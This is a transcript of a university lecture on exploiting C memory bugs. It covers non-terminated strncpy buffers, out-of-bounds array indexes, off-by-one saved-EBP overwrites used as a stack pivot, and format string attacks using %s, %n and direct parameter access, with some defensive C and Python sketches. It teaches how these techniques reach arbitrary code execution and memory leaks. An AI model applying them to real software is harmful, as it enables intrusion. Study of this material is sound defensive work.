Thanks for your patience. We're not going to get to it today, but I was in the middle of revamping the slides for a later topic so they'll be much more clear, and I was getting so into it technically that somebody had to come and grab me. But I'm here, okay.
So, following up on what we were talking about. I know it's been a whole week since we've actually covered new material, but in that time I'm sure you've absorbed a lot of information about buffer overflows and those kinds of vulnerabilities. We've been looking at different kinds of things we can overflow, right? When we looked at a classic buffer overflow, what was it that we were trying to overwrite? Saved EIP, that was our target. We looked at jump buffers, the longjmp buffers, and we saw that we can overwrite those to control the instruction pointer. So now we'll look at some other types of things we can overflow.
This is a really interesting example that I like. We have a main program with two character arrays of 512 bytes each, a username and a password. We copy 512 bytes from argv[1] into password with strncpy, which is good. We then copy 512 bytes from argv[2] into username, we print out that we're going to do some password stuff, and then we return check password on password. Check password has its own buffer of 512 bytes. It copies the password that's passed in onto the stack, performs some cool crazy checks, prints out that it's checking, and then returns.
Why does this look fine? Because of the strncpy, right? We learned that strcpy is fundamentally not secure. Almost any time an attacker controls the second argument to strcpy, you can have a vulnerability.
But here we have a strncpy. So our first instinct is, well, hey, there's no problem here, there's no strcpy. What else makes it look like there's no problem? There's 512 everywhere. We have 512 bytes for the password in main and in check password. Each of these arrays is 512 bytes and each strncpy uses 512. So what makes you think that there could be a vulnerability here? The title of the slide, right? Context: you're looking at code in the middle of a security lecture.
So the question comes down to what exactly the semantics of strncpy are. Where do we always want to look? The man page. So we do man strncpy. It says strncpy copies at most len characters from the source into the destination. One thing we always want to check is whether the source and destination are in the right order, because if you mix those up when you're reading the code, you're going to misjudge the problem. The first argument is the destination and the second is the source, so we're copying from argv[1] into password, and that part's correct.
We continue to read. It says that if the source is less than len characters long, the remainder of the destination is filled with null characters. That's actually interesting, I did not know that. So if there are 10 characters in argv[1], strncpy copies 10 characters to the destination and then fills in 502 zeros. And then the next sentence: otherwise, the destination is not terminated.
So what does this mean? Think back to the code. When we have this strncpy, if we pass in 10,000 bytes for argv[1], how many bytes is it going to copy into the password buffer? 512, only 512 bytes.
But what's the very last byte? With zero-based indexing, after we try to copy those 10,000 bytes, what is password[511] going to be? Let's say I pass in 10,000 a's. Then password[511] will be an 'a' character. And what comes after that? We don't know. It's whatever is after it in memory. If we assume the stack looks like it does here, where username sits right after password on the stack, then that would be the first byte of username. So why is that a problem? There's no null terminator at the end of password.
So what happens when we copy argv[2] into username? Same thing, same problem. And where is the first byte of username on the stack? Right at index 512 relative to password, and there's no null byte between the end of password and the start of username. The same goes for the second byte of username, the third byte, the fourth byte, and so on.
So once this executes and we pass password to check password, what's the maximum possible string length we can have for password? Is it 512? It could be more than double, but we can't control what's after username, so we should at least terminate that ourselves. So we can have 512 characters from password plus 511 from username and then the null byte.
So strncpy seems more secure, but it has this terrible default behavior: when you pass in exactly len or more bytes, it does not null terminate. Using that fact, you're able to create a string for password that is longer than 512 bytes. This is actually very tricky.
So for strncpy, what should you be passing in as n? Length minus one. You always need to pass in length minus one and make sure the last byte is null, or manually set the last byte to be null after the copy. And you can use this behavior in all kinds of tricky situations.
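To make the "length minus one, then terminate" advice concrete, here is a minimal C sketch. The helper names (copy_terminated, is_terminated, raw_strncpy_terminates) and the 8-byte buffer are made up for illustration and are not from the slide. The last function only shows that strncpy with n equal to the buffer size leaves no terminator when the source is too long; it never reads past its own buffer.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Copy src into dst (capacity dst_size bytes) and always NUL-terminate.
 * Returns 1 if src fit completely, 0 if it had to be truncated. */
int copy_terminated(char *dst, size_t dst_size, const char *src)
{
    assert(dst != NULL && src != NULL);
    if (dst_size == 0)
        return 0;
    strncpy(dst, src, dst_size - 1);   /* "length minus one" */
    dst[dst_size - 1] = '\0';          /* manual terminator */
    return strlen(src) < dst_size;
}

/* Returns 1 if the first n bytes of buf contain a NUL byte. */
int is_terminated(const char *buf, size_t n)
{
    return memchr(buf, '\0', n) != NULL;
}

/* The pitfall: with n equal to the buffer size, strncpy writes no
 * terminator when src has n or more characters. */
int raw_strncpy_terminates(const char *src)
{
    char buf[8];
    strncpy(buf, src, sizeof buf);
    return is_terminated(buf, sizeof buf);
}
```

Calling raw_strncpy_terminates("AAAAAAAAAAAA") reports an unterminated buffer, while copy_terminated with the same input leaves a 7-character string followed by a NUL.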
Let's say that the buffer after yours, where username is here, was some hard-coded secret key. Or it doesn't have to be hard coded, just some secret value or key. If you can control the buffer underneath it and fill it with data with no null termination, and that buffer is then printed out to you in a print statement like this one, now you're able to extract information about whatever is above you on the stack. You can do this to leak pointers or addresses on the stack. Any kind of information that's behind your buffer, you can try to leak that way.
So this is a cool way to combine buffers on the stack when the results are not null terminated. It's this crazy mix of the fact that strings in C are null terminated and the fact that strncpy does not always add that ending zero. And people can write their own custom string copy routine and end up with the same style of vulnerability.
(Student question about overwriting other things on the stack.) Which one are you talking about, this strncpy or this strcpy? What is the maximum number of bytes we can change on the stack with the first strncpy? 512. We can only write 512 bytes on the stack because of this parameter here, the 512. We can't write past that. But because we now have two buffers right next to each other, if we fill the first one with all 512 bytes, then the first buffer is not null terminated. When we read from it, the read keeps going into the next buffer, so the string has a maximum size of almost 1,024, that is 1,023.
And even with that, we still can't overwrite anything in main. We're essentially just making the password string bigger, up to a maximum of 1,023, so when it gets copied into a buffer of only 512, that's where things get overwritten. So here we're not actually overwriting anything in the main function.
The overwrite happens because the password buffer in check password is overflowed, and we can control EIP that way.
(Student question.) I think that will probably depend on exactly the implementation of the string copy. Depending on how it does it, it will probably have some weird behavior. But yeah, there's probably a way you can use that to your advantage. I think the main point is that it's explicitly undefined, which means any libc can do whatever it wants there.
Make sure you null terminate all buffers. That's the coding lesson learned here.
Other types of overflow we can do: an index overflow takes advantage of the fact that there is no bounds checking on array accesses. These are actually going to be very easy to exploit. It depends on exactly how it's done, but if you can control the index, you can have it go outside that buffer, or even below that buffer with negative values.
We talked about this array bracket syntax. What is a[10] syntactically equivalent to? It's exactly the same thing as doing pointer arithmetic on a: go forward 10 of whatever element type you're pointing to, and then dereference that. It's literally just pointer arithmetic. So you can have a[-20]. You can put whatever you want in the brackets, because it's all just pointer arithmetic.
So for example, let's say we have some array, some index, and some value. We read from argv[1] and turn it into a number with strtol, so we're converting the string into a long, and we put it into index. We then parse a second string as base 16 into value, and we set array[index] to be value. So essentially there are two things we directly control: the index variable and the value.
And fundamentally, there's no checking here to say that index must be within the bounds of the array. So using this, we can directly access any memory outside of the array and change it to any arbitrary value.
You can see this if we just use an index of 11. That should overwrite saved EIP, right? There should be about eight bytes there, so eight and then four. Is that right? Oh wait, eight. Yes, okay. Drawing the picture makes this a lot easier.
And of course, we have to do multiple steps here. We have to get our shellcode somewhere in memory that's executable. We then set the value that we're writing to be the address of that shellcode, and we make sure that the index is correct. You can put in huge values for that index, so we can overwrite all kinds of stuff. Questions on this?
So it's all about thinking about what types of things can be attacked or controlled. From your perspective, you're thinking: what can I control? What kind of influence do I have over that program? Obviously, a real program is not going to be as simple as this, where it's literally reading in your index and your value. But maybe it's reading from a file. Maybe it's a file format, and the program reads an index into an array from the file and then reads some value that it wants to put there. And if you pass a negative value, maybe that lets you go outside the buffer.
You've always got to check. This is the fundamental problem we keep seeing. Not only when you're copying things, but also when you're accessing array elements: if it's ever possible for an attacker to influence which element of the array you access, then there could be a vulnerability there.
Loops.
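As a hedged sketch of the missing check, the function below parses an index (base 10) and a value (base 16) the way the lecture's example does, but refuses to store when the index falls outside the array. The name checked_store and the 10-element array are assumptions made for illustration, not the code from the slide.

```c
#include <assert.h>
#include <errno.h>
#include <stdlib.h>

#define ARRAY_LEN 10   /* hypothetical array size */

/* Parse idx_str (base 10) and val_str (base 16), then store the value in
 * array[index] only if the index is inside the array.
 * Returns 0 on success, -1 on malformed input or an out-of-range index. */
int checked_store(unsigned long array[ARRAY_LEN],
                  const char *idx_str, const char *val_str)
{
    char *end;
    long index;
    unsigned long value;

    assert(array != NULL && idx_str != NULL && val_str != NULL);

    errno = 0;
    index = strtol(idx_str, &end, 10);
    if (errno != 0 || end == idx_str || *end != '\0')
        return -1;
    /* The check the vulnerable version lacks: reject negative and
     * too-large indices before touching memory. */
    if (index < 0 || index >= ARRAY_LEN)
        return -1;

    errno = 0;
    value = strtoul(val_str, &end, 16);
    if (errno != 0 || end == val_str || *end != '\0')
        return -1;

    array[index] = value;
    return 0;
}
```

With this check in place, inputs such as an index of 11 or -1 are rejected instead of writing outside the array.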
I don't know about you, but off-by-one errors are probably the thing that happens more often than any other coding mistake I make. You're looping over something and you write a less than or equals instead of a less than. You reason it out in your head, you try it out, and yeah, it pretty much works, it's fine. And then five steps down the road, when you start running a lot of test cases, it doesn't work and you don't really understand why. That's usually why. Some of you can maybe sympathize.
So the idea is that we have a loop. We're going to loop over all the elements in the array from zero to the length of the array and set some value. Here we're not overwriting everything. It's not a huge buffer overflow where we can put arbitrary garbage on the stack and overflow everything. We can only overflow one single byte on the stack, that last byte. And even though it seems crazy, even one byte can allow us to completely control the program and EIP. We'll see how this works. There's actually a Phrack article about this, about overwriting the frame pointer, that we'll see.
So we have a buffer and some int i, and we loop i from zero to 256, with a less than or equals. It's noticeable if you're reading the source carefully, but if you're looking at assembly code it's very difficult to tell. It's like a JLE instead of a JL or something like that. In the loop we set buffer[i] equal to sm[i], where sm is the password, or whatever character pointer we pass into this function. And in main, we call this function with argv[1].
It's a similar thing to the strncpy example we looked at, right? You see 256, you see 256. It seems like this should be fine.
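Here is a small C sketch of the loop just described, next to the corrected bound. The function names and the extra guard byte are illustrative assumptions: so that the example does not actually corrupt memory, the off-by-one version writes into a destination that is one byte larger than the 256-byte buffer it stands in for, and that extra byte plays the role of whatever follows the real buffer.

```c
#include <assert.h>
#include <stddef.h>

#define BUF_LEN 256

/* Off-by-one version: "i <= BUF_LEN" runs 257 times, so it writes
 * dst[0] through dst[256]. dst must have BUF_LEN + 1 bytes here so the
 * sketch stays well defined; src must have at least 257 readable bytes. */
size_t copy_off_by_one(char *dst, const char *src)
{
    size_t i;
    assert(dst != NULL && src != NULL);
    for (i = 0; i <= BUF_LEN; i++)
        dst[i] = src[i];
    return i;   /* number of bytes written */
}

/* Corrected version: "i < BUF_LEN" writes exactly dst[0..255]. */
size_t copy_fixed(char *dst, const char *src)
{
    size_t i;
    assert(dst != NULL && src != NULL);
    for (i = 0; i < BUF_LEN; i++)
        dst[i] = src[i];
    return i;
}
```

The only difference between the two functions is the comparison operator, which is why this kind of bug is easy to miss in review.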
And it almost is, except for this equals sign right here.
So let's think about what the function does. I hope by now you all know what an epilogue is. We know the epilogue of a function is going to do a leave and then a return. If we break leave down, it moves EBP into the stack pointer, so it moves the stack pointer to where the current base pointer is, then it pops the value off the stack into EBP, and then it returns.
Let's say there's no additional padding on the stack. So the buffer here is 256 bytes, and it sits directly below what? Saved EBP. That means we can change one byte of it, because here we can actually alter 257 bytes. What is the byte that we're able to overwrite? It's in saved EBP, and not the entire value, only one byte. Which byte is that, the most significant or the least significant? The least significant, because of little-endianness. You should prove that to yourself.
So basically we know all this. We know how the epilogue works. We move the stack pointer up to the base pointer. We then pop EBP, so we take that saved EBP, and we know that this saved EBP is supposed to be what? The base pointer of the calling function. So it should point somewhere in main's frame. So we return up into main.
And then main is going to have its own epilogue. For the return 0, it moves zero into EAX, then it has its own leave and return: it sets the stack pointer to the current base pointer, does a pop EBP, and then does a return.
So the key is what happens when main's epilogue is executed. Now, on this slide, where it says main, that's wrong. This is the function's saved EBP.
There should be the buffer of main, and then there should be saved EBP, saved EIP, and then argc and argv. I think this slide is messed up.
So think about main. We can change one byte of EBP. When main returns and goes through its epilogue, what's the first thing that epilogue does? It changes the stack pointer to wherever the base pointer is. And because we control one byte, the least significant byte, we can now make the stack pointer point anywhere within a 256-byte range around that address. The next thing that happens is a pop EBP, so whatever value is currently where the stack pointer is pointing goes into EBP. And then the final thing that happens is what? A return, so whatever is on the stack at the stack pointer is where execution goes.
So by controlling the saved EBP of one function, we get control when we return back through the calling function. This is also called a stack pivot. Essentially we're moving and shifting the stack down a little bit. And if we put the value that we want somewhere on the stack within that range, main will think that's its saved EIP and will jump to it. That's the essence of what we're trying to do here.
So we know that we're going to copy all the values onto the stack, buffer[0], buffer[1], all the way up until we get to buffer[256]. And because we're talking about characters, we can only influence that one byte, the lowest of the four bytes of saved EBP. Really the goal here is to show you that EIP is not the only target. We can actually win completely with EBP. That's what we're going to see here.
We've done all of this before. So the idea is that we put our NOP sled and shellcode onto the stack just like normal.
Then we put the address of the shellcode, and we need that to be close to the stack pointer. Then we overwrite the lowest-order byte of the frame pointer, and we want to shift the stack so that eventually EIP becomes this address of the shellcode. We can do all this, we've already done all this.
So here we have our NOP sled, we have where our shellcode starts, we have where our shellcode ends, and then we have this address in the buffer. Just like a normal stack overflow, we need to have the address of the shellcode. However we're going to do that, we've done it before. We need to find some address that's inside the NOP sled or shellcode.
And now here, let's say the saved EBP is BFFFD5C. Or sorry, originally it's something else besides 5C. It's above 60, so it's got to be like 68 or something like that. We overwrite its low byte so that it ends in 5C. When main returns, it's going to set its base pointer to be BFFFD5C. So main thinks that the current EBP is here. Notice that this also means that after this point, any local variable access or any parameter access in main will be at an offset from this value that we just tampered with.
So we can use this not only to corrupt EIP, as we'll see in a second. We can also use it to trick main into thinking it has different local variables. If there's a local variable that says whether we're authenticated or not, we can shift the frame pointer down like this, point it at something we control, and now we control those local variables. That's like a data-oriented exploit, and there's research now on tools that do that automatically.
But for our purposes: why is it 5C and not 60? Because 60 is where the address of the shellcode is.
Yes, because the leave instruction is going to set the stack pointer to the current base pointer, and then it does a pop EBP, which moves the stack pointer up four bytes. Then it does a return, and the stack pointer at that point is pointing to BFFFC74. So that's going to go into our shellcode and everything's going to work.
So what is one trick that you have to get right here? Besides getting the address of your shellcode, what's the other thing you need to get right? The last byte here. How do you do that? You can debug it. You look at it in a debugger, because that byte is going to depend on the stack, on what the actual stack layout is at that point. So you can use GDB.
(Student suggestion: just as we have a NOP sled, we could have a sled of the same address repeated.) Very good. Yes, we can actually have an address sled, because all we need is that wherever we end up pointing that frame pointer, the thing above it is the address we want. So we can put 10 copies of the address there.
What's the other option? When you're in a technical interview, what should your first instinct be when you answer a question? Brute force, the simple, stupid thing. How many tries do you need to brute force here? 256. It's a byte, so there are only 256 values that can go there. Just do it 256 times. I don't even need to calculate it or worry about it. As long as everything else is set up correctly and your address is actually within that range, it'll work.
(Student question about using argv.) Yes, if argv is within 256 bytes of where the current stack pointer is. And you may have to play games, because think about this: you can only control the least significant byte of that stack address. So let's say the current stack pointer is something like BFFFFD and some low byte. The exact value doesn't matter.
If your argv is up at BFFFFF and some low byte, you'll never be able to point to it, because you can't control those upper three bytes. But if it's close enough, you can add additional things to your environment or additional argv parameters to move the stack down. As long as you're within 256 bytes, you can maybe get it to where the saved EBP is at BFFFFD00 and your argv is within the 256 bytes above that.
(Student: but couldn't you still set EIP to point to something in argv?) Oh, put the shellcode there? Yes. You still need this to point to the shellcode, so you need your address of the shellcode. The trick is that the location holding that address, BFFFC74 here, has to be within 256 bytes of that EBP value. But yes, you can put your shellcode wherever you want, as long as the address points to it.
So let's walk through this a little bit. We're moving EBP into ESP for the function. Nothing has gone wrong yet at this step. We then pop EBP, so now we're putting our tainted value into EBP. Now the base pointer points down here, at the very last four bytes of the shellcode. And when we return, remember, the stack pointer is still in the same place. We haven't changed the stack pointer. So we go back to the saved EIP in main.
Then main is going to return, and it does the same thing. What happens next is exactly what we talked about. In main's epilogue, we move the base pointer into the stack pointer, but unlike literally every other time we've done this, the stack pointer moves down. It moves down to wherever our new EBP is, which is here. We pop that into EBP, which will then hold some value we actually don't care about. And then we return to the address of the shellcode, execution starts at our shellcode, and we're good.
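The two epilogues above can be traced with a toy model. This is only a sketch: it simulates a 32-bit stack as an array of words and implements leave and ret as plain C functions. Every address in the usage note is a made-up example value rather than the one from the slide, and the struct and function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define STACK_WORDS 64   /* models 256 bytes of stack */

/* Toy 32-bit machine: a word-addressed stack window plus three registers. */
struct toy_cpu {
    uint32_t base;               /* address modelled by mem[0] (hypothetical) */
    uint32_t mem[STACK_WORDS];
    uint32_t esp, ebp, eip;
};

/* Read the 32-bit word stored at a simulated stack address. */
static uint32_t load(const struct toy_cpu *c, uint32_t addr)
{
    assert(addr >= c->base && (addr - c->base) / 4 < STACK_WORDS);
    return c->mem[(addr - c->base) / 4];
}

/* leave = mov esp, ebp ; pop ebp */
void do_leave(struct toy_cpu *c)
{
    c->esp = c->ebp;
    c->ebp = load(c, c->esp);
    c->esp += 4;
}

/* ret = pop eip */
void do_ret(struct toy_cpu *c)
{
    c->eip = load(c, c->esp);
    c->esp += 4;
}

/* Replace only the least significant byte of a saved EBP value, which is
 * all the off-by-one overflow can reach on a little-endian machine. */
uint32_t overwrite_low_byte(uint32_t saved_ebp, uint8_t b)
{
    return (saved_ebp & 0xFFFFFF00u) | b;
}
```

For example, take a window starting at 0xbffffc00 with a shellcode address stored at 0xbffffc60. If the tampered EBP ends in 0x5c, then main's leave leaves ESP at 0xbffffc60, and the following ret loads the shellcode address into EIP. That is the reason the overwritten byte must be four less than the location of the address.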
Yeah, so the shellcode itself can definitely be anywhere that's executable. So any questions on this? It's a pretty cool technique. It's niche, but it's very powerful.
(Student question about the pop EBP loading a garbage value.) So one thing to think about: remember, I can move, let's say, the value zero into register EAX. Now there are zeros in EAX. That does not cause a segfault, even though memory address zero is not mapped. When does it cause a segfault? When I dereference it, exactly. So it's fine as long as wherever I'm going never dereferences EBP. But yeah, I may have to worry about that, so it could be an issue depending on where I want to go. That's specifically why we wrote our shellcode such that it doesn't care what's in those registers.
So this tells us two things: you need to thoroughly check loops, and you need to pay very close attention, because even an off-by-one-byte problem can result in complete arbitrary code execution. One other related thing: if a user can supply how many times you loop, that's obviously bad.
Off-by-one vulnerabilities can cause crashes and execution of arbitrary code. We're more interested in the execution of arbitrary code, but a crash should always get your attention. You've heard the saying, where there's smoke, there's fire. A crash of a program is the smoke that tells you, oh man, there's something wrong here, and you start digging until you create an exploit, and that's the fire.
Now we get to another cool vulnerability: format string vulnerabilities. Fundamentally, this applies any time an attacker can control the string that is passed as the format argument of a format string function. It's not always the first argument.
Whichever argument specifies the format, if an adversary controls it, it's possible for them to read any arbitrary memory location and write to any arbitrary memory location.
So this type of call is okay. Why is it okay? Look at the printf function. The first argument is the format string. Just like when you're printing stuff out, you can use %d to print integers, %s to print strings, %x to print in hex, all kinds of things. And this one is fundamentally okay because the format string is hard coded. Unless there's some other vulnerability that allows somebody to overwrite whatever this is pointing to, which could be possible but would be pretty complex, this is fundamentally okay. No matter what the adversary puts in for name, it doesn't matter. It's still not possible for them to control how that format string is parsed.
On the other hand, if you're passing a buffer to printf as the format, and that buffer is controlled by the user, now you have a format string vulnerability.
So in this case, if I do printf of buf and buf contains "%d %d", what's that going to do? How does printf work? If you had to write printf yourself, what would you do? It uses a list of optional arguments at the end. If you have additional arguments, they're just going to be above the format string on the stack. And what is printf doing with this format string argument? It's expecting two integers. How does it know to expect two integers? It has to parse the string. When, at compile time? No, at run time. If you look at the printf function, you'll see code that literally loops over and parses this first string so that it can determine how many arguments it should be looking for.
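A short C sketch of both points follows. The first helper shows the safe pattern: untrusted text is only ever passed as data to a hard-coded "%s" format. The second is a deliberately simplified parser that counts how many arguments a format string would ask for. Both function names are made up for illustration, and real printf parsing handles flags, widths, and length modifiers that this sketch ignores.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/* Safe pattern: the format is a literal, so whatever is in `untrusted`
 * is copied out verbatim and never interpreted as directives. */
int render_untrusted(char *out, size_t out_size, const char *untrusted)
{
    assert(out != NULL && untrusted != NULL);
    return snprintf(out, out_size, "%s", untrusted);
}

/* Simplified stand-in for the run-time parsing printf performs: every
 * '%' that is not part of "%%" is counted as one requested argument. */
size_t count_directives(const char *fmt)
{
    size_t n = 0;
    const char *p;
    assert(fmt != NULL);
    for (p = fmt; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {      /* literal percent sign */
            p++;
            continue;
        }
        if (p[1] == '\0')       /* dangling '%' at the end */
            break;
        n++;
    }
    return n;
}
```

For the attacker-style input "%d %d", count_directives reports two requested arguments even though the caller supplied none, while render_untrusted simply reproduces the five characters unchanged.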
Fundamentally, when printf is called, it does not know how many arguments were passed to it. When it gets executed, the only thing it knows is the format string. It knows that the first argument had better be a format string, and then it interprets the type and the number of every other argument based on the content of that string.
We know from our usage of printf that when it sees the first %d, that means print out the next argument, in this case the second argument, as an integer, and the next %d prints out the third argument. So how does printf calculate where the second argument is? It's on the stack, four bytes above the first argument. And the third argument is four bytes above the second argument on the stack. It has no way of knowing that the function was only called with one argument. So it's going to print out whatever values are on the stack where those arguments should be. This is a trivial way to get it to print out the values on the stack.
This is another place where I'd urge you to read the man page. I know you knew I was going to say that.
(Student: instead of %d, if you put %s in the buffer, does that change what gets printed?) Think about that, we'll come back to it.
So we look at the man page for printf, and you can see it in the function definitions of all these functions. The ellipsis in all of these, the dot dot dot, means it's a variadic function. I'm not actually sure how to pronounce the name, but I think that's the name for this kind of function. It's a C function that can take an arbitrary number of arguments.
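To illustrate what "the callee does not know how many arguments were passed" means, here is a minimal variadic function in C. The name sum_ints is hypothetical. Like printf, it has to trust something the caller tells it (a count here, a format string for printf) to decide how many arguments to fetch.

```c
#include <assert.h>
#include <stdarg.h>

/* Sums `count` int arguments. The function cannot verify that `count`
 * matches what the caller really passed; if the caller lies, va_arg
 * reads whatever happens to be in the next argument slots, which is
 * undefined behaviour. */
int sum_ints(int count, ...)
{
    va_list ap;
    int total = 0;
    int i;

    assert(count >= 0);
    va_start(ap, count);
    for (i = 0; i < count; i++)
        total += va_arg(ap, int);
    va_end(ap);
    return total;
}
```

A call such as sum_ints(3, 1, 2, 3) behaves as expected because the count and the arguments agree; printf is in the same position, except that its "count" comes from parsing the format string.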
And so at run time, the printf function has to parse the format to figure out how many arguments were passed. If you can control this format, you can read arbitrary memory or execute arbitrary code.
The reason why is that printf itself is essentially a whole other language. I know it's really easy to think of it as just %x and %d, but it is insanely complicated. We're not going to get into it, but you can look it up: there's a paper from a group showing that printf is actually Turing complete. So anything you want to do in any language, you can write a printf format string to do. We can do arbitrary computation.
For our purposes, there are all kinds of modifiers and conversions. There are a couple of things to look at. We were talking about s. The s conversion means a character pointer argument. It's expected to be a pointer to an array of character type. Characters from the array are written up to, but not including, a terminating null character.
So if we substitute %s in there for %d, what would happen? Probably a segfault. Why? %d prints out the value that's on the stack as an integer. %s says: take that value on the stack and dereference it. If that byte is not null, print it out, and then add one to the address. If that byte is not null, print it out, and add one to the address again. So it is fundamentally dereferencing whatever is on the stack.
That's actually a great and easy way to test whether there is a format string vulnerability. If you pass in a bunch of %s's and the program crashes, you know it probably has a format string vulnerability, because it's crashing while trying to dereference an address that's not valid. You can also use this to print out stuff that you want. If there's a pointer on the stack to some secret value, you can print that out.
(Student: on the same note, in the earlier example we had username and password as strings.)
Yes. (Student: when we did the strncpy for both of them, we never filled in the null character. So when we print the password, it could cause the same problem, since it prints until it reads a null character.) Correct. In that case, when it's printing out those arrays, it'll print out the 1,024 characters, and then it'll print out any other characters after that until it gets to a null. So yes, we could maybe use that to leak other information off the stack. But we'll see that with a format string we can just do that directly. We don't actually need that trick. It can leak us extra uninitialized memory, though.
Okay, so other things that printf is going to do, and this is crazy. Let's think about this. Say we want to get something that is 10 arguments up the stack from the first argument. I'm going to use %x, so it prints in hex. You'd have to write 10 %x's, and go through the second, third, and fourth argument all the way up. That's annoying.
There's actually a different syntax you can use, for directly accessing arguments. It makes sense: if you're writing a printf, you may want to refer to the same thing twice. You may want to say, print out the second argument, then the first argument, and then the second argument again. So part of the format string specification is an optional field consisting of a decimal digit string followed by a dollar sign, specifying the next argument to access. If this field is not provided, the argument following the last argument accessed will be used. Arguments are numbered starting at 1.
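A benign use of the numbered-argument syntax looks like the sketch below. It assumes a POSIX-style printf implementation (for example glibc, musl, or the BSD libc), since the `n$` form is a POSIX extension rather than part of ISO C, and some compilers warn about it in strict modes. The function name format_swapped is made up for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/* Prints the second argument, then the first, then the second again,
 * using numbered argument access ("%2$s" means "argument number 2"). */
int format_swapped(char *out, size_t out_size,
                   const char *first, const char *second)
{
    assert(out != NULL && first != NULL && second != NULL);
    return snprintf(out, out_size, "%2$s %1$s %2$s", first, second);
}
```

Calling format_swapped with "a" and "b" produces the text "b a b". In an attack, the same mechanism lets a short format string name an argument slot far up the stack without consuming all the slots before it.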
So this means %1$x will print out the first argument in hex, and %5$x will print out the fifth argument in hex. And that's fantastic. With %i$p we don't have to walk up the stack one argument at a time, so we can get at any arbitrary offset from the first argument. We can put in arbitrary values here. I don't think you can put in a negative value, but you can put a very large value in there. So, using this, you can literally read any memory above the current stack pointer. There's one more thing, which is insane. If you're bored, you should read through the man page to see all the madness that printf allows. But the one crazy madness comes from people adding features to software without thinking about the consequences. Some of the use cases of printf are to print out reports. So you need reporting, and it needs to be in certain columns and formats and blah, blah, blah. So maybe we want to know how many characters we've written out, not for the whole printf string, but at a certain point in the printf string. Let's say we print out the username and password, and now we want to know how many characters we printed out, because maybe we want to adjust the offset on the terminal, or whatever you want to do with it. So they said, ah, great, we'll add another directive to printf called n. A %n takes an integer pointer, so it expects there to be an address on the stack, and it writes to that address how many characters have been output up to that point. Who controls how many characters the printf string outputs? We do, because we control the format string. So we can control the value that's being written by changing how many characters are output. What's the second thing we need to control? Well, OK, we'll talk about that in a sec.
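The direct parameter access syntax described above is easy to generate mechanically. The following is a minimal Python sketch, not something from the lecture: the helper name `probe` and the dot separator are assumptions made for illustration. It only builds the format string that an attacker would feed to a vulnerable printf call; it does not call printf itself.

```python
def probe(first, count, conv="p"):
    """Build a format string that reads `count` consecutive printf arguments,
    starting at argument number `first` (printf numbers arguments from 1)."""
    if first < 1 or count < 1:
        raise ValueError("argument numbers start at 1")
    # "%3$p" means: print argument number 3 as a pointer.
    return ".".join(f"%{i}${conv}" for i in range(first, first + count))


print(probe(1, 3))        # %1$p.%2$p.%3$p
print(probe(10, 1, "x"))  # %10$x
```

Compared with writing ten %x's in a row, the second call reaches the tenth argument with a five-character directive.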
So as long as we have a pointer on the stack, we can write whatever we want to that memory location. Fundamentally, %n allows us to write whatever we want anywhere in the program. So what kind of value do we actually want to write? Essentially, the address of the shellcode. Let's say we want to overwrite EIP with the address of our shellcode. But the address of the shellcode is a stack address. What have all of our stack addresses started with? Something like 0xbfff, whatever. Do you know what that number is? Yeah, it's about 3 billion, so around 3 gigabytes of output. It's a huge, huge number. And it's all about how many characters we've output: the number we can write is the number of characters we've output. So do we want to send 3 gigabytes' worth of A's just to get up to the number we want to write? No, because oftentimes, as we've seen, the buffers we have aren't that big. The format string that we can input to the program is only about 500 bytes, but we still want to be able to write arbitrarily large addresses. So we can use another crazy feature of the format string: an optional decimal digit string specifying a minimum field width. If the converted value has fewer characters than the field width, it will be padded with spaces on the left. So if we put in something like %65000x, it's going to print out the first argument on the stack in hex, and it's going to pad it with spaces so that it outputs at least 65,000 characters. So we can input a really small format string but control large values in the output. Now, fundamentally, we still don't want to output that much; we'll get there in a second. The same thing works with %p. Using %20p, it prints the current argument as a pointer, so it does 0x and then the hex value, padded out to 20 characters. So we have %n, good.
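To make the interaction between the field width and %n concrete, here is a small Python model of a tiny subset of printf. It is only a sketch under stated assumptions: the function `simulate` and the dictionary standing in for memory are hypothetical, and only `%<width>x` and `%n` are handled (no flags, no `$`, no length modifiers).

```python
import re

# Only a tiny subset of printf is modeled: %<width>x and %n.
DIRECTIVE = re.compile(r"%(\d*)([xn])")


def simulate(fmt, args):
    """Return (output, memory) after 'printing' fmt with the given args."""
    args = iter(args)
    out = []
    written = 0   # characters output so far
    memory = {}   # address -> value stored by %n (stand-in for real memory)
    pos = 0
    for m in DIRECTIVE.finditer(fmt):
        literal = fmt[pos:m.start()]
        out.append(literal)
        written += len(literal)
        width, conv = m.group(1), m.group(2)
        if conv == "x":
            # Minimum field width: pad with spaces on the left.
            text = format(next(args), "x").rjust(int(width or 0))
            out.append(text)
            written += len(text)
        else:
            # %n prints nothing; it stores the running count at the pointer.
            memory[next(args)] = written
        pos = m.end()
    out.append(fmt[pos:])
    return "".join(out), memory


output, memory = simulate("AAAA%65000x%n", [0x1, 0x080497D8])
print(len(output))                                # 65004
print({hex(k): v for k, v in memory.items()})     # {'0x80497d8': 65004}
```

A 13-character format string produces 65,004 characters of output, and that count is what lands at the address consumed by %n.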
So now we have all the building blocks that we need in order to read and write memory. If we look at a simple vulnerable program, we're opening up some log file, we're calling add_log with that file, and then we're closing it. In add_log, we loop, reading a line at a time, and we print it out in the loop. We're using fprintf, so we're printing out to f this value line, which came from the read. The read function is reading from zero. What's zero? Standard in. So it's reading a line from standard in, and that's where we get that buffer. It's taking our input and writing it out to this log file, this file pointer. You might think this looks correct: you got some input, and you're trying to write it out to the log file. But instead of using fwrite, we're using fprintf, which means that this value we're using for line is going to be interpreted as a format string. And thus we can give as input anything we want, and it will be interpreted as a format string. So we can do cool things. We're going to pass in, as input to this program, four A's, then four B's, then four C's, then four D's, and then eight %p's. And remember, this is actually a little bit trickier, because you're not getting the output directly. It's going into this temp log file, so you have to go and look there. So what is it printing out? Why did it print out four A's, four B's, four C's, and four D's? Is it because these A's, B's, C's, and D's are living on the stack? No. Because that's the format string. What was that? It was in your format string. The format string, right. It's just like when you say printf("hello"): it's going to print out hello. So I told it to print out four A's, then four B's, then four C's, then four D's, and it's doing exactly what it was told.
